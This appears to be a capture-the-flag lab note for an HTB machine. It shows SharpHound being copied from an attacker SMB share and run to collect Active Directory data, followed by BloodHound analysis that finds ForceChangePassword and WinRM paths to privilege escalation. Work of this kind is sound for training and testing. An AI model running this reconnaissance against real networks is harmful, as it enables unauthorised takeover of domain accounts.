InfoSec LAB

Axlle_BloodHound

Created: 2 min read

BloodHound

BloodHound is a powerful tool used by adversaries to visualize and analyze Active Directory relationships, allowing them to quickly identify and exploit potential attack paths and privilege escalation opportunities within a network. It automates the reconnaissance phase of an attack, helping attackers pinpoint weak points and ultimately compromise Active Directory environments.

Ingestion

PS C:\Users\gideon.hamill\Desktop> copy \\10.10.14.110\smb\SharpHound.exe
PS C:\Users\gideon.hamill\Desktop> .\SharpHound.exe -c All
 
2024-06-27T10:28:48.6631925-07:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
2024-06-27T10:28:48.8194579-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-06-27T10:28:48.8507126-07:00|INFORMATION|Initializing SharpHound at 10:28 AM on 6/27/2024
2024-06-27T10:28:49.0226127-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-06-27T10:28:49.1788222-07:00|INFORMATION|Beginning LDAP search for axlle.htb
2024-06-27T10:28:49.2256937-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-06-27T10:28:49.2256937-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-06-27T10:29:19.4132303-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2024-06-27T10:29:35.2569515-07:00|INFORMATION|Consumers finished, closing output channel
Closing writers
2024-06-27T10:29:35.2882460-07:00|INFORMATION|Output channel closed, waiting for output task to complete
2024-06-27T10:29:35.3819444-07:00|INFORMATION|Status: 113 objects finished (+113 2.456522)/s -- Using 44 MB RAM
2024-06-27T10:29:35.3819444-07:00|INFORMATION|Enumeration finished in 00:00:46.2057541
2024-06-27T10:29:35.4444480-07:00|INFORMATION|Saving cache with stats: 72 ID to type mappings.
 74 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-06-27T10:29:35.4600826-07:00|INFORMATION|SharpHound Enumeration Completed at 10:29 AM on 6/27/2024! Happy Graphing!

There already is an existing PowerShell session as the gideon.hamill user, so I’ll be using SharpHound Ingestion complete with SharpHound.exe

┌──(kali㉿kali)-[~/…/htb/labs/axlle/bloodhound]
└─$ sudo neo4j console  
Directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /usr/share/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /usr/share/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /usr/share/neo4j/run
Starting Neo4j.
 
┌──(kali㉿kali)-[~/…/htb/labs/axlle/bloodhound]
└─$ bloodhound

Firing up neo4j and bloodhound

Uploading ingested domain data

dallon.matrix

The dallon.matrix user has the transitive ForceChangePassword access to both baz.humphries and jacob.greeny users from a membership to the Web Devs group

jacob.greeny

The jacob.greeny user is part of the Remote Management Users group, allowing the user the WinRM access to the target system

baz.humphries

The baz.humphries user is part of the Remote Management Users group, allowing the user the WinRM access to the target system

Interactive Graph View

Backlinks